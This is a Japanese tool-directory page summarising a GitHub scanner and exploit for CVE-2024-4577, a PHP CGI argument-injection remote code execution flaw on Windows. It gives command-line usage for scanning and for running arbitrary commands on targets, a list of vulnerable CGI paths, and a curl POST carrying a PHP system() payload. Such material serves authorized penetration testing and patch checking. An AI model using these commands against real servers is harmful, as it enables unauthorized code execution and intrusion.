Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-4577 — CVE-2024-4577用のスキャナおよびエクスプロイトツール。Windowsシステム上でリモートコード実行を可能にするPHP CGI引数インジェクション脆弱性です。検出モジュールとコマンド実行モジュールが含まれています。 | Kitploit
ツール/GitHubGitHub/r0otk3r/cve-2024-4577
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubr0otk3r/cve-2024-4577

CVE-2024-4577

CVE-2024-4577用のスキャナおよびエクスプロイトツール。Windowsシステム上でリモートコード実行を可能にするPHP CGI引数インジェクション脆弱性です。検出モジュールとコマンド実行モジュールが含まれています。

リポジトリを見る
81年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577 - PHP CGI 引数インジェクション RCE

概要

CVE-2024-4577 は、Windows システム上で CGI モードで動作する PHP に影響を与える重大な PHP CGI 引数インジェクション脆弱性 です。この欠陥により、リモートの攻撃者は特別に細工された URL を介して PHP のコマンドラインに 引数を注入 し、リモートコード実行 (RCE) を引き起こす可能性があります。

このリポジトリには以下が含まれます:

  • CVE-2024-4577.py: 脆弱なターゲットを検出する スキャナー。
  • exploit.py: PHP コードを送信し、脆弱なサーバー上でシステムコマンドを実行する エクスプロイトツール。

⚠️ 免責事項
このプロジェクトは 教育および認可されたテスト のみを目的としています。このコードの誤用は作者の責任ではありません。自分が所有する、または明示的な許可を得た環境でのみ責任を持って使用してください。


必要条件

  • Python 3.x
  • requests ライブラリ

依存関係をインストール:

pip install -r requirements.txt

スキャナーの使用法

ターゲットが CVE-2024-4577 に対して脆弱かどうかを検出します:

単一ターゲット

python3 CVE-2024-4577.py -u http://target.com

1

ファイルからの複数ターゲット

python3 CVE-2024-4577.py -f urls.txt

2

カスタムパス(オプション)

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php

脆弱なパスの例

スキャナーとエクスプロイトは、以下のような一般的な CGI エンドポイントをテストします:

/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello

ペイロードは cgi.force_redirect をバイパスし、php://input を使用して悪意のある PHP を先頭に追加します。


エクスプロイトの使用法

脆弱なターゲット上で任意のシステムコマンドを実行します:

単一ターゲット

python3 exploit.py -u http://target.com -c "id"

4

ファイルからの複数ターゲット

python3 exploit.py -f urls.txt -c "id"

5

curl を使用する

curl を使用して手動で脆弱性を悪用することもできます:

curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"

これにより、サーバー上で uname -a を実行し、出力を返す PHP ペイロードが送信されます。

3

ライセンス

このコードは MIT ライセンスの下で公開されています。詳細については LICENSE を参照してください。


公式チャンネル

  • YouTube @rootctf
  • X @r0otk3r
ツールをダウンロード